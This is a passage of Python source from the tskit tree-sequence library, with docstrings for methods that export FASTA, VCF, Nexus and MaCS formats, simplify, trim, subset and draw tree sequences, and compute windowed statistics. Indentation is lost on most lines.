Returns an array of the sample node IDs in this tree sequence. If the
``population`` parameter is specified, only return sample IDs from that
population.
:param int population: The population of interest. If None,
return all samples.
:param int population_id: Deprecated alias for ``population``.
:return: A numpy array of the node IDs for the samples of interest,
listed in numerical order.
:rtype: numpy.ndarray (dtype=np.int32)
"""
if population is not None and population_id is not None:
raise ValueError(
"population_id and population are aliases. Cannot specify both"
)
if population_id is not None:
population = population_id
samples = self._ll_tree_sequence.get_samples()
if population is not None:
sample_population = self.tables.nodes.population[samples]
samples = samples[sample_population == population]
return samples
    def write_fasta(self, output, sequence_ids=None, wrap_width=60):
        ""
        # suppress fasta visibility pending https://github.com/tskit-dev/tskit/issues/353
        # NOTE: the empty string above is the actual (empty) docstring; the
        # triple-quoted string below is a deliberately detached expression
        # statement so the documentation is hidden from Sphinx for now.
        """
        Writes haplotype data for samples in FASTA format to the
        specified file-like object.

        Default `sequence_ids` (i.e. the text immediately following ">") are
        "tsk_{sample_number}" e.g. "tsk_0", "tsk_1" etc. They can be set by providing
        a list of strings to the `sequence_ids` argument, which must equal the length
        of the number of samples. Please ensure that these are unique and compatible with
        fasta standards, since we do not check this.

        Default `wrap_width` for sequences is 60 characters in accordance with fasta
        standard outputs, but this can be specified. In order to avoid any line-wrapping
        of sequences, set `wrap_width = 0`.

        Example usage:

        .. code-block:: python

            with open("output.fasta", "w") as fasta_file:
                ts.write_fasta(fasta_file)

        This can also be achieved on the command line use the ``tskit fasta`` command,
        e.g.:

        .. code-block:: bash

            $ tskit fasta example.trees > example.fasta

        :param io.IOBase output: The file-like object to write the fasta output.
        :param list(str) sequence_ids: A list of string names to uniquely identify
            each of the sequences in the fasta file. If specified, this must be a
            list of strings of length equal to the number of samples which are output.
            Note that we do not check the form of these strings in any way, so that it
            is possible to output bad fasta IDs (for example, by including spaces
            before the unique identifying part of the string).
            The default is to output ``tsk_j`` for the jth individual.
        :param int wrap_width: This parameter specifies the number of sequence
            characters to include on each line in the fasta file, before wrapping
            to the next line for each sequence. Defaults to 60 characters in
            accordance with fasta standard outputs. To avoid any line-wrapping of
            sequences, set `wrap_width = 0`. Otherwise, supply any positive integer.
        """
        # if not specified, IDs default to sample index
        # NOTE(review): the default names use the sample node IDs from
        # self.samples(), which need not be 0..n-1 — confirm this matches the
        # documented "tsk_{sample_number}" behaviour.
        if sequence_ids is None:
            sequence_ids = [f"tsk_{j}" for j in self.samples()]
        if len(sequence_ids) != self.num_samples:
            raise ValueError(
                "sequence_ids must have length equal to the number of samples."
            )
        wrap_width = int(wrap_width)
        if wrap_width < 0:
            raise ValueError(
                "wrap_width must be a non-negative integer. "
                "You may specify `wrap_width=0` "
                "if you do not want any wrapping."
            )
        # Haplotypes are emitted in the same order as self.samples().
        for j, hap in enumerate(self.haplotypes()):
            print(">", sequence_ids[j], sep="", file=output)
            if wrap_width == 0:
                print(hap, file=output)
            else:
                for hap_wrap in textwrap.wrap(hap, wrap_width):
                    print(hap_wrap, file=output)
def write_vcf(
self,
output,
ploidy=None,
contig_id="1",
individuals=None,
individual_names=None,
position_transform=None,
):
"""
Writes a VCF formatted file to the specified file-like object.
If there is individual information present in the tree sequence
(see :ref:`sec_individual_table_definition`), the values for
sample nodes associated with these individuals are combined
into phased multiploid individuals and output.
If there is no individual data present in the tree sequence, synthetic
individuals are created by combining adjacent samples, and the number
of samples combined is equal to the specified ploidy value (1 by
default). For example, if we have a ploidy of 2 and a sample of size 6,
then we will have 3 diploid samples in the output, consisting of the
combined genotypes for samples [0, 1], [2, 3] and [4, 5]. If we had
genotypes 011110 at a particular variant, then we would output the
diploid genotypes 0|1, 1|1 and 1|0 in VCF.
Each individual in the output is identified by a string; these are the
VCF "sample" names. By default, these are of the form ``tsk_0``,
``tsk_1`` etc, up to the number of individuals, but can be manually
specified using the ``individual_names`` argument. We do not check
for duplicates in this array, or perform any checks to ensure that
the output VCF is well-formed.
.. note::
Warning to ``plink`` users:
As the default first individual name is ``tsk_0``, ``plink`` will
throw this error when loading the VCF:
``Error: Sample ID ends with "_0", which induces an invalid IID of '0'.``
This can be fixed by using the ``individual_names`` argument
to set the names to anything where the first name doesn't end with ``_0``.
An example implementation for diploid individuals is:
.. code-block:: python
n_dip_indv = int(ts.num_samples / 2)
indv_names = [f"tsk_{str(i)}indv" for i in range(n_dip_indv)]
with open("output.vcf", "w") as vcf_file:
ts.write_vcf(vcf_file, ploidy=2, individual_names=indv_names)
Adding a second ``_`` (eg: ``tsk_0_indv``) is not recommended as
``plink`` uses ``_`` as the default separator for separating family
id and individual id, and two ``_`` will throw an error.
The REF value in the output VCF is the ancestral allele for a site
and ALT values are the remaining alleles. It is important to note,
therefore, that for real data this means that the REF value for a given
site **may not** be equal to the reference allele. We also do not
check that the alleles result in a valid VCF---for example, it is possible
to use the tab character as an allele, leading to a broken VCF.
The ``position_transform`` argument provides a way to flexibly translate
the genomic location of sites in tskit to the appropriate value in VCF.
There are two fundamental differences in the way that tskit and VCF define
genomic coordinates. The first is that tskit uses floating point values
to encode positions, whereas VCF uses integers. Thus, if the tree sequence
contains positions at non-integral locations there is an information loss
incurred by translating to VCF. By default, we round the site positions
to the nearest integer, such that there may be several sites with the
same integer position in the output. The second difference between VCF
and tskit is that VCF is defined to be a 1-based coordinate system, whereas
tskit uses 0-based. However, how coordinates are transformed depends
on the VCF parser, and so we do **not** account for this change in
coordinate system by default.
Example usage:
.. code-block:: python
with open("output.vcf", "w") as vcf_file:
tree_sequence.write_vcf(vcf_file, ploidy=2)
The VCF output can also be compressed using the :mod:`gzip` module, if you wish:
.. code-block:: python
import gzip
with gzip.open("output.vcf.gz", "wt") as f:
ts.write_vcf(f)
However, this gzipped VCF may not be fully compatible with downstream tools
such as tabix, which may require the VCF use the specialised bgzip format.
A general way to convert VCF data to various formats is to pipe the text
produced by ``tskit`` into ``bcftools``, as done here:
.. code-block:: python
import os
import subprocess
read_fd, write_fd = os.pipe()
write_pipe = os.fdopen(write_fd, "w")
with open("output.bcf", "w") as bcf_file:
proc = subprocess.Popen(
["bcftools", "view", "-O", "b"], stdin=read_fd, stdout=bcf_file
)
ts.write_vcf(write_pipe)
write_pipe.close()
os.close(read_fd)
proc.wait()
if proc.returncode != 0:
raise RuntimeError("bcftools failed with status:", proc.returncode)
This can also be achieved on the command line use the ``tskit vcf`` command,
e.g.:
.. code-block:: bash
$ tskit vcf example.trees | bcftools view -O b > example.bcf
:param io.IOBase output: The file-like object to write the VCF output.
:param int ploidy: The ploidy of the individuals to be written to
VCF. This sample size must be evenly divisible by ploidy.
:param str contig_id: The value of the CHROM column in the output VCF.
:param list(int) individuals: A list containing the individual IDs to
write out to VCF. Defaults to all individuals in the tree sequence.
:param list(str) individual_names: A list of string names to identify
individual columns in the VCF. In VCF nomenclature, these are the
sample IDs. If specified, this must be a list of strings of
length equal to the number of individuals to be output. Note that
we do not check the form of these strings in any way, so that is
is possible to output malformed VCF (for example, by embedding a
tab character within on of the names). The default is to output
``tsk_j`` for the jth individual.
:param position_transform: A callable that transforms the
site position values into integer valued coordinates suitable for
VCF. The function takes a single positional parameter x and must
return an integer numpy array the same dimension as x. By default,
this is set to ``numpy.round()`` which will round values to the
nearest integer. If the string "legacy" is provided here, the
pre 0.2.0 legacy behaviour of rounding values to the nearest integer
(starting from 1) and avoiding the output of identical positions
by incrementing is used.
"""
writer = vcf.VcfWriter(
self,
ploidy=ploidy,
contig_id=contig_id,
individuals=individuals,
individual_names=individual_names,
position_transform=position_transform,
)
writer.write(output)
def to_nexus(self, precision=14):
"""
Returns a `nexus encoding <https://en.wikipedia.org/wiki/Nexus_file>`_
of this tree sequence. Trees along the sequence are listed sequentially in
the TREES block. The tree spanning the interval :math:`[x, y)`` is
given the name "tree_x_y". Spatial positions are written at the
specified precision.
Nodes in the tree sequence are identified by the taxon labels of the
form ``f"tsk_{node.id}_{node.flags}"``, such that a node with ``id=5``
and ``flags=1`` will have the label ``"tsk_5_1"`` (please see the
:ref:`data model <sec_node_table_definition>` section for details
on the interpretation of node ID and flags values). These labels are
listed for all nodes in the tree sequence in the ``TAXLABELS`` block.
:param int precision: The numerical precision with which branch lengths
and tree positions are printed.
:return: A nexus representation of this TreeSequence.
:rtype: str
"""
node_labels = {node.id: f"tsk_{node.id}_{node.flags}" for node in self.nodes()}
s = "#NEXUS\n"
s += "BEGIN TAXA;\n"
s += "TAXLABELS "
s += ",".join(node_labels[node.id] for node in self.nodes()) + ";\n"
s += "END;\n"
s += "BEGIN TREES;\n"
for tree in self.trees():
start_interval = "{0:.{1}f}".format(tree.interval.left, precision)
end_interval = "{0:.{1}f}".format(tree.interval.right, precision)
newick = tree.newick(precision=precision, node_labels=node_labels)
s += f"\tTREE tree{start_interval}_{end_interval} = {newick}\n"
s += "END;\n"
return s
def to_macs(self):
"""
Return a `macs encoding <https://github.com/gchen98/macs>`_
of this tree sequence.
:return: The macs representation of this TreeSequence as a string.
:rtype: str
"""
n = self.get_sample_size()
m = self.get_sequence_length()
output = [f"COMMAND:\tnot_macs {n} {m}"]
output.append("SEED:\tASEED")
for variant in self.variants(as_bytes=True):
output.append(
f"SITE:\t{variant.index}\t{variant.position / m}\t0.0\t"
f"{variant.genotypes.decode()}"
)
return "\n".join(output) + "\n"
def simplify(
self,
samples=None,
*,
map_nodes=False,
reduce_to_site_topology=False,
filter_populations=True,
filter_individuals=True,
filter_sites=True,
keep_unary=False,
keep_unary_in_individuals=None,
keep_input_roots=False,
record_provenance=True,
filter_zero_mutation_sites=None, # Deprecated alias for filter_sites
):
"""
Returns a simplified tree sequence that retains only the history of
the nodes given in the list ``samples``. If ``map_nodes`` is true,
also return a numpy array whose ``u``th element is the ID of the node
in the simplified tree sequence that corresponds to node ``u`` in the
original tree sequence, or :data:`tskit.NULL` (-1) if ``u`` is no longer
present in the simplified tree sequence.
In the returned tree sequence, the node with ID ``0`` corresponds to
``samples[0]``, node ``1`` corresponds to ``samples[1]`` etc., and all
the passed-in nodes are flagged as samples. The remaining node IDs in
the returned tree sequence are allocated sequentially in time order
and are not flagged as samples.
If you wish to simplify a set of tables that do not satisfy all
requirements for building a TreeSequence, then use
:meth:`TableCollection.simplify`.
If the ``reduce_to_site_topology`` parameter is True, the returned tree
sequence will contain only topological information that is necessary to
represent the trees that contain sites. If there are zero sites in this
tree sequence, this will result in an output tree sequence with zero edges.
When the number of sites is greater than zero, every tree in the output
tree sequence will contain at least one site. For a given site, the
topology of the tree containing that site will be identical
(up to node ID remapping) to the topology of the corresponding tree
in the input tree sequence.
If ``filter_populations``, ``filter_individuals`` or ``filter_sites`` is
True, any of the corresponding objects that are not referenced elsewhere
are filtered out. As this is the default behaviour, it is important to
realise IDs for these objects may change through simplification. By setting
these parameters to False, however, the corresponding tables can be preserved
without changes.
:param list[int] samples: A list of node IDs to retain as samples. They
need not be nodes marked as samples in the original tree sequence, but
will constitute the entire set of samples in the returned tree sequence.
If not specified or None, use all nodes marked with the IS_SAMPLE flag.
The list may be provided as a numpy array (or array-like) object
(dtype=np.int32).
:param bool map_nodes: If True, return a tuple containing the resulting
tree sequence and a numpy array mapping node IDs in the current tree
sequence to their corresponding node IDs in the returned tree sequence.
If False (the default), return only the tree sequence object itself.
:param bool reduce_to_site_topology: Whether to reduce the topology down
to the trees that are present at sites. (Default: False)
:param bool filter_populations: If True, remove any populations that are
not referenced by nodes after simplification; new population IDs are
allocated sequentially from zero. If False, the population table will
not be altered in any way. (Default: True)
:param bool filter_individuals: If True, remove any individuals that are
not referenced by nodes after simplification; new individual IDs are
allocated sequentially from zero. If False, the individual table will
not be altered in any way. (Default: True)
:param bool filter_sites: If True, remove any sites that are
not referenced by mutations after simplification; new site IDs are
allocated sequentially from zero. If False, the site table will not
be altered in any way. (Default: True)
:param bool keep_unary: If True, preserve unary nodes (i.e. nodes with
exactly one child) that exist on the path from samples to root.
(Default: False)
:param bool keep_unary_in_individuals: If True, preserve unary nodes
that exist on the path from samples to root, but only if they are
associated with an individual in the individuals table. Cannot be
specified at the same time as ``keep_unary``. (Default: ``None``,
equivalent to False)
:param bool keep_input_roots: Whether to retain history ancestral to the
MRCA of the samples. If ``False``, no topology older than the MRCAs of the
samples will be included. If ``True`` the roots of all trees in the returned
tree sequence will be the same roots as in the original tree sequence.
(Default: False)
:param bool record_provenance: If True, record details of this call to
simplify in the returned tree sequence's provenance information
(Default: True).
:param bool filter_zero_mutation_sites: Deprecated alias for ``filter_sites``.
:return: The simplified tree sequence, or (if ``map_nodes`` is True)
a tuple consisting of the simplified tree sequence and a numpy array
mapping source node IDs to their corresponding IDs in the new tree
sequence.
:rtype: .TreeSequence or (.TreeSequence, numpy.ndarray)
"""
tables = self.dump_tables()
assert tables.sequence_length == self.sequence_length
node_map = tables.simplify(
samples=samples,
reduce_to_site_topology=reduce_to_site_topology,
filter_populations=filter_populations,
filter_individuals=filter_individuals,
filter_sites=filter_sites,
keep_unary=keep_unary,
keep_unary_in_individuals=keep_unary_in_individuals,
keep_input_roots=keep_input_roots,
record_provenance=record_provenance,
filter_zero_mutation_sites=filter_zero_mutation_sites,
)
new_ts = tables.tree_sequence()
assert new_ts.sequence_length == self.sequence_length
if map_nodes:
return new_ts, node_map
else:
return new_ts
def delete_sites(self, site_ids, record_provenance=True):
"""
Returns a copy of this tree sequence with the specified sites (and their
associated mutations) entirely removed. The site IDs do not need to be in any
particular order, and specifying the same ID multiple times does not have any
effect (i.e., calling ``tree_sequence.delete_sites([0, 1, 1])`` has the same
effect as calling ``tree_sequence.delete_sites([0, 1])``.
:param list[int] site_ids: A list of site IDs specifying the sites to remove.
:param bool record_provenance: If ``True``, add details of this operation to the
provenance information of the returned tree sequence. (Default: ``True``).
"""
tables = self.dump_tables()
tables.delete_sites(site_ids, record_provenance)
return tables.tree_sequence()
def delete_intervals(self, intervals, simplify=True, record_provenance=True):
"""
Returns a copy of this tree sequence for which information in the
specified list of genomic intervals has been deleted. Edges spanning these
intervals are truncated or deleted, and sites and mutations falling within
them are discarded. Note that it is the information in the intervals that
is deleted, not the intervals themselves, so in particular, all samples
will be isolated in the deleted intervals.
Note that node IDs may change as a result of this operation,
as by default :meth:`.simplify` is called on the returned tree sequence
to remove redundant nodes. If you wish to map node IDs onto the same
nodes before and after this method has been called, specify ``simplify=False``.
See also :meth:`.keep_intervals`, :meth:`.ltrim`, :meth:`.rtrim`, and
:ref:`missing data<sec_data_model_missing_data>`.
:param array_like intervals: A list (start, end) pairs describing the
genomic intervals to delete. Intervals must be non-overlapping and
in increasing order. The list of intervals must be interpretable as a
2D numpy array with shape (N, 2), where N is the number of intervals.
:param bool simplify: If True, return a simplified tree sequence where nodes
no longer used are discarded. (Default: True).
:param bool record_provenance: If ``True``, add details of this operation to the
provenance information of the returned tree sequence. (Default: ``True``).
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.delete_intervals(intervals, simplify, record_provenance)
return tables.tree_sequence()
def keep_intervals(self, intervals, simplify=True, record_provenance=True):
"""
Returns a copy of this tree sequence which includes only information in
the specified list of genomic intervals. Edges are truncated to lie within
these intervals, and sites and mutations falling outside these intervals
are discarded. Note that it is the information outside the intervals that
is deleted, not the intervals themselves, so in particular, all samples
will be isolated outside of the retained intervals.
Note that node IDs may change as a result of this operation,
as by default :meth:`.simplify` is called on the returned tree sequence
to remove redundant nodes. If you wish to map node IDs onto the same
nodes before and after this method has been called, specify ``simplify=False``.
See also :meth:`.keep_intervals`, :meth:`.ltrim`, :meth:`.rtrim`, and
:ref:`missing data<sec_data_model_missing_data>`.
:param array_like intervals: A list (start, end) pairs describing the
genomic intervals to keep. Intervals must be non-overlapping and
in increasing order. The list of intervals must be interpretable as a
2D numpy array with shape (N, 2), where N is the number of intervals.
:param bool simplify: If True, return a simplified tree sequence where nodes
no longer used are discarded. (Default: True).
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence.
(Default: True).
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.keep_intervals(intervals, simplify, record_provenance)
return tables.tree_sequence()
def ltrim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with a potentially changed coordinate
system, such that empty regions (i.e. those not covered by any edge) at the start
of the tree sequence are trimmed away, and the leftmost edge starts at position
0. This affects the reported position of sites and edges. Additionally, sites and
their associated mutations to the left of the new zero point are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.ltrim(record_provenance)
return tables.tree_sequence()
def rtrim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with the ``sequence_length`` property reset
so that the sequence ends at the end of the rightmost edge. Additionally, sites
and their associated mutations at positions greater than the new
``sequence_length`` are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.rtrim(record_provenance)
return tables.tree_sequence()
def trim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with any empty regions (i.e. those not
covered by any edge) on the right and left trimmed away. This may reset both the
coordinate system and the ``sequence_length`` property. It is functionally
equivalent to :meth:`.rtrim` followed by :meth:`.ltrim`. Sites and their
associated mutations in the empty regions are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.trim(record_provenance)
return tables.tree_sequence()
def subset(
self,
nodes,
record_provenance=True,
reorder_populations=True,
remove_unreferenced=True,
):
"""
Returns a tree sequence containing only information directly
referencing the provided list of nodes to retain. The result will
retain only the nodes whose IDs are listed in ``nodes``, only edges for
which both parent and child are in ``nodes```, only mutations whose
node is in ``nodes``, and only individuals that are referred to by one
of the retained nodes. Note that this does *not* retain
the ancestry of these nodes - for that, see ::meth::`.simplify`.
This has the side effect of reordering the nodes, individuals, and
populations in the tree sequence: the nodes in the new tree sequence
will be in the order provided in ``nodes``, and both individuals and
populations will be ordered by the earliest retained node that refers
to them. (However, ``reorder_populations`` may be set to False
to keep the population table unchanged.)
By default, the method removes all individuals and populations not
referenced by any nodes, and all sites not referenced by any mutations.
To retain these unreferencd individuals, populations, and sites, pass
``remove_unreferenced=False``. If this is done, the site table will
remain unchanged, unreferenced individuals will appear at the end of
the individuals table (and in their original order), and unreferenced
populations will appear at the end of the population table (unless
``reorder_populations=False``).
.. seealso::
:meth:`.keep_intervals` for subsetting a given portion of the genome;
:meth:`.simplify` for retaining the ancestry of a subset of nodes.
:param list nodes: The list of nodes for which to retain information. This
may be a numpy array (or array-like) object (dtype=np.int32).
:param bool record_provenance: Whether to record a provenance entry
in the provenance table for this operation.
:param bool reorder_populations: Whether to reorder populations
(default: True). If False, the population table will not be altered in
any way.
:param bool remove_unreferenced: Whether sites, individuals, and populations
that are not referred to by any retained entries in the tables should
be removed (default: True). See the description for details.
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.subset(
nodes,
record_provenance=record_provenance,
reorder_populations=reorder_populations,
remove_unreferenced=remove_unreferenced,
)
return tables.tree_sequence()
def union(
self,
other,
node_mapping,
check_shared_equality=True,
add_populations=True,
record_provenance=True,
):
"""
Returns an expanded tree sequence which contains the node-wise union of
``self`` and ``other``, obtained by adding the non-shared portions of
``other`` onto ``self``. The "shared" portions are specified using a
map that specifies which nodes in ``other`` are equivalent to those in
``self``: the ``node_mapping`` argument should be an array of length
equal to the number of nodes in ``other`` and whose entries are the ID
of the matching node in ``self``, or ``tskit.NULL`` if there is no
matching node. Those nodes in ``other`` that map to ``tskit.NULL`` will
be added to ``self``, along with:
1. Individuals whose nodes are new to ``self``.
2. Edges whose parent or child are new to ``self``.
3. Mutations whose nodes are new to ``self``.
4. Sites which were not present in ``self``, if the site contains a newly
added mutation.
By default, populations of newly added nodes are assumed to be new
populations, and added to the population table as well.
Note that this operation also sorts the resulting tables, so the
resulting tree sequence may not be equal to ``self`` even if nothing
new was added (although it would differ only in ordering of the tables).
:param TableCollection other: Another table collection.
:param list node_mapping: An array of node IDs that relate nodes in
``other`` to nodes in ``self``.
:param bool check_shared_equality: If True, the shared portions of the
tree sequences will be checked for equality. It does so by
subsetting both ``self`` and ``other`` on the equivalent nodes
specified in ``node_mapping``, and then checking for equality of
the subsets.
:param bool add_populations: If True, nodes new to ``self`` will be
assigned new population IDs.
:param bool record_provenance: Whether to record a provenance entry
in the provenance table for this operation.
"""
tables = self.dump_tables()
other_tables = other.dump_tables()
tables.union(
other_tables,
node_mapping,
check_shared_equality=check_shared_equality,
add_populations=add_populations,
record_provenance=record_provenance,
)
return tables.tree_sequence()
def draw_svg(
self,
path=None,
*,
size=None,
x_scale=None,
tree_height_scale=None,
node_labels=None,
mutation_labels=None,
root_svg_attributes=None,
style=None,
order=None,
force_root_branch=None,
symbol_size=None,
x_axis=None,
x_label=None,
x_lim=None,
y_axis=None,
y_label=None,
y_ticks=None,
y_gridlines=None,
**kwargs,
):
"""
Return an SVG representation of a tree sequence.
When working in a Jupyter notebook, use the ``IPython.display.SVG`` function
to display the SVG output from this function inline in the notebook::
>>> SVG(tree.draw_svg())
The visual elements in the svg are
`grouped <https://www.w3.org/TR/SVG2/struct.html#Groups>`_
for easy styling and manipulation. The entire visualization with trees and X
axis is contained within a group of class ``tree-sequence``. Each tree in
the displayed tree sequence is contained in a group of class ``tree``, as
described in :meth:`Tree.draw_svg`, so that visual elements pertaining to one
or more trees targetted as documented in that method. For instance, the
following style will change the colour of all the edges of the *initial*
tree in the sequence and hide the non-sample node labels in *all* the trees
.. code-block:: css
.tree.t0 .edge {stroke: blue}
.tree .node:not(.sample) > text {visibility: hidden}
See :meth:`Tree.draw_svg` for further details.
:param str path: The path to the file to write the output. If None, do not write
to file.
:param size: A tuple of (width, height) giving the width and height of the
produced SVG drawing in abstract user units (usually interpreted as pixels on
display).
:type size: tuple(int, int)
:param str x_scale: Control how the X axis is drawn. If "physical" (the default)
the axis scales linearly with physical distance along the sequence,
background shading is used to indicate the position of the trees along the
X axis, and sites (with associated mutations) are marked at the
appropriate physical position on axis line. If "treewise", each axis tick
corresponds to a tree boundary, which are positioned evenly along the axis,
so that the X axis is of variable scale, no background scaling is required,
and site positions are not marked on the axis.
:param str tree_height_scale: Control how height values for nodes are computed.
If this is equal to ``"time"``, node heights are proportional to their time
values (this is the default). If this is equal to ``"log_time"``, node
heights are proportional to their log(time) values. If it is equal to
``"rank"``, node heights are spaced equally according to their ranked times.
:param node_labels: If specified, show custom labels for the nodes
(specified by ID) that are present in this map; any nodes not present will
not have a label.
:type node_labels: dict(int, str)
:param mutation_labels: If specified, show custom labels for the
mutations (specified by ID) that are present in the map; any mutations
not present will not have a label.
:type mutation_labels: dict(int, str)
:param dict root_svg_attributes: Additional attributes, such as an id, that will
be embedded in the root ``<svg>`` tag of the generated drawing.
:param str style: A `css string <https://www.w3.org/TR/CSS21/syndata.htm>`_
that will be included in the ``<style>`` tag of the generated svg.
:param str order: A string specifying the traversal type used to order the tips
in each tree, as detailed in :meth:`Tree.nodes`. If None (default), use
the default order as described in that method.
:param bool force_root_branch: If ``True`` plot a branch (edge) above every tree
root in the tree sequence. If ``None`` (default) then only plot such
root branches if any root in the tree sequence has a mutation above it.
:param float symbol_size: Change the default size of the node and mutation
plotting symbols. If ``None`` (default) use a standard size.
:param bool x_axis: Should the plot have an X axis line, showing the positions
of trees along the genome. The scale used is determined by the ``x_scale``
parameter. If ``None`` (default) plot an X axis.
:param str x_label: Place a label under the plot. If ``None`` (default) and
there is an X axis, create and place an appropriate label.
:param list x_lim: A list of size two giving the genomic positions between which
trees should be plotted. If the first is ``None``, then plot from the first
non-empty region of the tree sequence. If the second is ``None``, then plot
up to the end of the last non-empty region of the tree sequence. The default
value ``x_lim=None`` is shorthand for the list [``None``, ``None``]. If
numerical values are given, then regions outside the interval have all
information discarded: this means that mutations outside the interval will
not be shown. To force display of the entire tree sequence, including empty
flanking regions, specify ``x_lim=[0, ts.sequence_length]``.
:param bool y_axis: Should the plot have an Y axis line, showing time (or
ranked node time if ``tree_height_scale="rank"``. If ``None`` (default)
do not plot a Y axis.
:param str y_label: Place a label to the left of the plot. If ``None`` (default)
and there is a Y axis, create and place an appropriate label.
:param list y_ticks: A list of Y values at which to plot tickmarks (``[]``
gives no tickmarks). If ``None``, plot one tickmark for each unique
node value.
:param bool y_gridlines: Whether to plot horizontal lines behind the tree
at each y tickmark.
:return: An SVG representation of a tree sequence.
:rtype: str
.. note::
Technically, x_lim[0] specifies a *minimum* value for the start of the X
axis, and x_lim[1] specifies a *maximum* value for the end. This is only
relevant if the tree sequence contains "empty" regions with no edges or
mutations. In this case if x_lim[0] lies strictly within an empty region
(i.e. ``empty_tree.interval.left < x_lim[0] < empty_tree.interval.right``)
then that tree will not be plotted on the left hand side, and the X axis
will start at ``empty_tree.interval.right``. Similarly, if x_lim[1] lies
strictly within an empty region then that tree will not be plotted on the
right hand side, and the X axis will end at ``empty_tree.interval.left``
"""
draw = drawing.SvgTreeSequence(
self,
size,
x_scale=x_scale,
tree_height_scale=tree_height_scale,
node_labels=node_labels,
mutation_labels=mutation_labels,
root_svg_attributes=root_svg_attributes,
style=style,
order=order,
force_root_branch=force_root_branch,
symbol_size=symbol_size,
x_axis=x_axis,
x_label=x_label,
x_lim=x_lim,
y_axis=y_axis,
y_label=y_label,
y_ticks=y_ticks,
y_gridlines=y_gridlines,
**kwargs,
)
output = draw.drawing.tostring()
if path is not None:
# TODO remove the 'pretty' when we are done debugging this.
draw.drawing.saveas(path, pretty=True)
return output
def draw_text(self, **kwargs):
# TODO document this method.
return str(drawing.TextTreeSequence(self, **kwargs))
############################################
#
# Statistics computation
#
############################################
def general_stat(
self,
W,
f,
output_dim,
windows=None,
polarised=False,
mode=None,
span_normalise=True,
strict=True,
):
"""
Compute a windowed statistic from weights and a summary function.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
On each tree, this
propagates the weights ``W`` up the tree, so that the "weight" of each
node is the sum of the weights of all samples at or below the node.
Then the summary function ``f`` is applied to the weights, giving a
summary for each node in each tree. How this is then aggregated depends
on ``mode``:
"site"
Adds together the total summary value across all alleles in each window.
"branch"
Adds together the summary value for each node, multiplied by the
length of the branch above the node and the span of the tree.
"node"
Returns each node's summary value added across trees and multiplied
by the span of the tree.
Both the weights and the summary can be multidimensional: if ``W`` has ``k``
columns, and ``f`` takes a ``k``-vector and returns an ``m``-vector,
then the output will be ``m``-dimensional for each node or window (depending
on "mode").
.. note::
The summary function ``f`` should return zero when given both 0 and
the total weight (i.e., ``f(0) = 0`` and ``f(np.sum(W, axis=0)) = 0``),
unless ``strict=False``. This is necessary for the statistic to be
unaffected by parts of the tree sequence ancestral to none or all
of the samples, respectively.
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each weight.
:param f: A function that takes a one-dimensional array of length
equal to the number of columns of ``W`` and returns a one-dimensional
array.
:param int output_dim: The length of ``f``'s return value.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param bool polarised: Whether to leave the ancestral state out of computations:
see :ref:`sec_stats` for more details.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool strict: Whether to check that f(0) and f(total weight) are zero.
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if mode is None:
mode = "site"
if strict:
total_weights = np.sum(W, axis=0)
for x in [total_weights, total_weights * 0.0]:
with np.errstate(invalid="ignore", divide="ignore"):
fx = np.array(f(x))
fx[np.isnan(fx)] = 0.0
if not np.allclose(fx, np.zeros((output_dim,))):
raise ValueError(
"Summary function does not return zero for both "
"zero weight and total weight."
)
return self.__run_windowed_stat(
windows,
self.ll_tree_sequence.general_stat,
W,
f,
output_dim,
polarised=polarised,
span_normalise=span_normalise,
mode=mode,
)
def sample_count_stat(
self,
sample_sets,
f,
output_dim,
windows=None,
polarised=False,
mode=None,
span_normalise=True,
strict=True,
):
"""
Compute a windowed statistic from sample counts and a summary function.
This is a wrapper around :meth:`.general_stat` for the common case in
which the weights are all either 1 or 0, i.e., functions of the joint
allele frequency spectrum.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`sample sets <sec_stats_sample_sets>`,
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
If ``sample_sets`` is a list of ``k`` sets of samples, then
``f`` should be a function that takes an argument of length ``k`` and
returns a one-dimensional array. The ``j``-th element of the argument
to ``f`` will be the number of samples in ``sample_sets[j]`` that lie
below the node that ``f`` is being evaluated for. See
:meth:`.general_stat` for more details.
Here is a contrived example: suppose that ``A`` and ``B`` are two sets
of samples with ``nA`` and ``nB`` elements, respectively. Passing these
as sample sets will give ``f`` an argument of length two, giving the number
of samples in ``A`` and ``B`` below the node in question. So, if we define
.. code-block:: python
def f(x):
pA = x[0] / nA
pB = x[1] / nB
return np.array([pA * pB])
then if all sites are biallelic,
.. code-block:: python
ts.sample_count_stat([A, B], f, 1, windows="sites", polarised=False, mode="site")
would compute, for each site, the product of the derived allele
frequencies in the two sample sets, in a (num sites, 1) array. If
instead ``f`` returns ``np.array([pA, pB, pA * pB])``, then the
output would be a (num sites, 3) array, with the first two columns
giving the allele frequencies in ``A`` and ``B``, respectively.
.. note::
The summary function ``f`` should return zero when given both 0 and
the sample size (i.e., ``f(0) = 0`` and
``f(np.array([len(x) for x in sample_sets])) = 0``). This is
necessary for the statistic to be unaffected by parts of the tree
sequence ancestral to none or all of the samples, respectively.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param f: A function that takes a one-dimensional array of length
